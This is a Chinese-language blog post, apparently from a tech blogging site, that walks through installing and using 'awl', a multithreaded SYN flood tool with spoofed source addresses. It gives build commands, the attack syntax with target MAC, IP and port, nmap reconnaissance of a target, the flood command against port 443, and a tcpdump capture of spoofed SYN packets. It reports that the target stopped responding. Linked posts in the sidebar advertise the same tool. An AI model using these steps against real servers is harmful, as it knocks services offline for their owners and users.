linux awl***程序说明

最新推荐文章于 2023-01-08 16:47:20 发布
最新推荐文章于 2023-01-08 16:47:20 发布
阅读量806 收藏
点赞数
分类专栏: 运维

一,安装: 
tar -zxvf awl-0.2.tar.gz 
./configure 
make 
make install 

awl的执行程序安装后在/usr/local/bin/目录下 

二,说明: 
awl 的格式如下: 
./awl -i eth0 -m aa:bb:cc:dd:ee:ff -d ip -p port 

参数如下: 
-i 发送包的接口,如果省略默认是eth0 
-m 被攻击机器的mac地址,程序不能根据被攻击IP得到MAC,需要手工指定.先ping 目标IP,再arp -a就可以看到.如果省略则为ff:ff:ff:ff:ff:ff 
-d 被攻击机器的IP 
-p 被攻击机器的端口. 

三,测试, 
服务器端:centOS 5.0 
对方服务器:freebsd   6.2   运行apache 

1,首先得知对方IP 
运行nmap -v -A 192.168.0.1   查看对方开了啥服务 
[root@localhost bin]# nmap -v -A 10.122.89.106 

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2008-06-02 19:24 CST 
DNS resolution of 1 IPs took 0.39s. 
Initiating SYN Stealth Scan against 10.122.89.106 [1680 ports] at 19:24 
Discovered open port 21/tcp on 10.122.89.106 
Discovered open port 25/tcp on 10.122.89.106 
Discovered open port 22/tcp on 10.122.89.106 
Discovered open port 443/tcp on 10.122.89.106 
Discovered open port 80/tcp on 10.122.89.106 
Discovered open port 199/tcp on 10.122.89.106 
Discovered open port 110/tcp on 10.122.89.106 
Discovered open port 143/tcp on 10.122.89.106 
Discovered open port 3306/tcp on 10.122.89.106 

得知对方开了如上端口 

ping 192.168.0.1   得知mac地址 
查看arp -a 得知对方IP的MAC地址 

2.开始攻击: 
./awl -i eth0 -m aa:bb:cc:dd:ee:ff -d 192.168.0.1 -p 443 

ping 192.168.0.1 -t 查下对方反应 

四,测试效果 
攻击一开始,对方明显挂掉,各种应用无反应, 
如下是抓包: 
[root@localhost ~]# tcpdump 
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode 
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes 
19:26:10.765001 IP 196.224.129.69.58334 > 10.122.82.169.https: S 2137366997:2137366997(0) win 57403 
19:26:13.835951 IP 221.140.165.45.45259 > 10.122.82.169.https: S 2020705765:2020705765(0) win 28443 
19:26:14.379435 IP 108.99.168.18.63871 > 10.122.82.169.https: S 1625298749:1625298749(0) win 23981 
19:26:14.917676 IP 141.90.214.98.34527 > 10.122.82.169.https: S 697113617:697113617(0) win 48400 
19:26:15.645562 IP 111-104.dsl.sky.cz.33734 > 10.122.82.169.https: S 1620903624:1620903624(0) win 34262 
19:26:16.396435 IP 135.205.163.109.59589 > 10.122.82.169.https: S 1747490631:1747490631(0) win 40348

cnsdlywei
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
awl-0.2.tar.gz TCP SYN洪水攻击 linux工具
01-19
awl-0.2.tar.gz TCP SYN洪水攻击 linux工具 多线程mac伪装SYN洪水攻击工具
awl-0.2.tar.gz
01-03
网上的一个syn flood攻击的代码,多线程写的
awl 多线程SYN***工具0.2版[转]
weixin_34261415的博客
03-28 285
awl 多线程SYN***工具0.2版http://blog.chinaunix.net/u/7546/showart_1160329.html一,安装:tar -zxvf awl-0.2.tar.gz./configuremake make installawl的执行程序安装后在/usr/local/bin/目录下二,说明:awl 的格式如下:./awl -i eth0 -...
Linux使用awl0.2进行局域网SYN进行洪水ATT
weixin_34184561的博客
03-28 230
SYN洪水ATT的过程: 在服务端返回一个确认的SYN-ACK包的时候有个潜在的弊端,如果发起的客户是一个不存在的客户端,那么服务端就不会接到客户端回应的ACK包。这时服务端需要耗费一定的数量的系统内存来等待这个未决的连接,直到等待超关闭,才能施放内存。如果恶意者通过通过ip欺骗,发送大量SYN包给受害者系统,导致服务端存在大量未决的连接并占用大量内存和tcp连接,从而导致正常客户端无法访问服务...
Linux实战:awl-2.0工具模拟洪水攻击,建立大量的TCP连接
熊博主
07-25 1338
实战:awl工具模拟洪水攻击,建立大量未完成第二次握手的TCP连接 基于TCP协议的数据传输,需要进行三次握手四次挥手才可以完成。每一次连接都会占用系统内存,直至连接关闭才会释放系统内存。在进行第一次握手时,客户端向服务端发送一个请求连接的报文,然后客户端进入SYN_SEND状态,服务器被动打开,进入SYN_RECV状态。这时进行第二次握手,服务端发送一个ACK确认报文给客户端,客户端正常是会收到ACK确认报文,然后客户端发送一个ACK报文给服务端,并进入ESTABLISHED状态。服务端接收客户端发来的A
NMAP - A Stealth Port Scanner
moxuansheng的专栏
05-13 2048
 NMAP - A Stealth Port ScannerAndrew J. Benniestonhttp://nmap.org/bennieston-tutorial/Contents1  IntroductionNmap is a free, open-source port scanner available for both UNIX andW
39.网络基础
最新发布
weixin_47252600的博客
01-08 315
一些计算机网络的初级基础知识
TCP三次握手之-awl工具-SYN洪水攻击
心有鸿鹄天地,不敢妄坠人间
03-06 2170
文章目录云盾数据TCP三次握手TCP报文段的头部格式实战-使用tcpdump 抓包tcpdump 常用参数tcpdmp 抓包awl -syn-洪水攻击原理实战总结: 云盾数据 - http://ssa.yundun.com/cc #云盾全球实时攻防图 TCP三次握手 TCP报文段的头部格式 图 ACK:TCP协议规定,只有ack=1时,有效,也规定连接建立后,所有发送的报文ack必须为...
语音合成芯片——SYN6658
weixin_52801934的博客
10-20 3800
SYN6658是中文语音合成芯片,通过UART 接口或SPI 接口通讯方式,接收待合成的文本数据,实现文本到语音的转换。可以采用GB2312、GBK、BIG5 和Unicode 四种编码方式。我们一般直接采用语音合成模块YS-V6来实现语音的播放,直接将单片机(或六合一串口)与语音合成模块之间通过串口通信方式连接,按照“5 个字节帧头+文本”的格式进行数据发送即可。
pyhs2-0.2.tar.gz
11-24
python 连接hive1.2.1 的工具类。
libdca-0.0.2.tar.gz
11-10
linux 下安装ffmpeg 所需解码器包 同时可查阅本人博客 “Linux 下完整安装ffmpeg(包括各种解码器)”,提供linux下ffmpeg的安装步骤以及安装过程中出现的问题处理记录。
nlp-lang-0.2.jar
12-23
详细说明:这是分词工具ANSJ2.0以后版本需要的JAR包。-This is the ANSJ code after the 2 segmentation tool.
云计算高级运维第一阶段项目实战:在局域网中使用 awl 伪装 MAC 地址进行多线程 SYN 洪水攻击
maergaiyun的博客
03-14 2613
在局域网中使用 awl 伪装 MAC 地址进行多线程 SYN 洪水攻击 (1)SYN洪水攻击的过程 在服务器返回一个确认的 SYN-ACK包的时候有个潜在的弊端,如果发起的客户是一个不存在的客户端,那么服务端就不会接到客户端回应的 ACK包。这时服务端需要耗费一定数量的系统内存来等待这个未决的连接,直到等待超关闭,才能释放内存。 如果恶意者通过 IP欺骗,发送大量 SYN包给受害者...
Linux中的awk 【常用指令精简】
dddxxy的博客
06-12 2604
AWK是一种优良的文本处理工具。它不仅是 Linux 中也是任何环境中现有的功能最强大的数据处理引擎之一。这种编程及数据操作语言(其名称得自于它的创始人 Alfred Aho 、Peter Weinberger 和 Brian Kernighan 姓氏的首个字母)的最大功能取决于一个人所拥有的知识。AWK 提供了极其强大的功能:可以进行样式装入、流控制、数学运算符、进程控制语句甚至于内置的变量和函...
一份spyglass做lint的lint.prj
热门推荐
cy413026的博客
10-23 1万+
目录 1.命令解释 1.1 以上的几类命令 1.1.1 set_option 1.1.2 current_methodology 1.1.3 current_goal 1.1.4 read_file 1.1.5 set_goal_option 1.1.6 set_parameter 对于以上命令的解释需要逐步更新,有些命令一看便知功能不再赘述。这些配置可以在使用spyglas...
awl伪装MAC地址进行多线程SYN攻击
qq_39122260的博客
02-17 249
SYN洪水攻击的过程: 在服务端返回一个确认的SYN-ACK包的时候有个潜在的弊端,如 果发起的客户是一个不存在的客户端,那么服务端就不会接到客户端回应的ACK 包。 这时服务端需要耗费一定的数量的系统内存来等待这个未决的连接,直到等待超关 闭,才能释放内存。 如果恶意者通过ip欺骗,发送大量SYN包给受害者系统,导致服务端存在大量未 解决连接并占用大量内存和tcp连接,从而导致正常客户端无法访问服务端, 这就是SYN洪水攻击的过程。 安装awl tar zxvf awl-0.2.tar...
"AWL学术词汇表:IELTS、TOEFL考试必备介绍和完整word版下载
The Academic Word List (AWL) is a compilation of 570 word families that were carefully selected based on specific principles. Developed by Averil Coxhead as part of her MA thesis at the School of ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值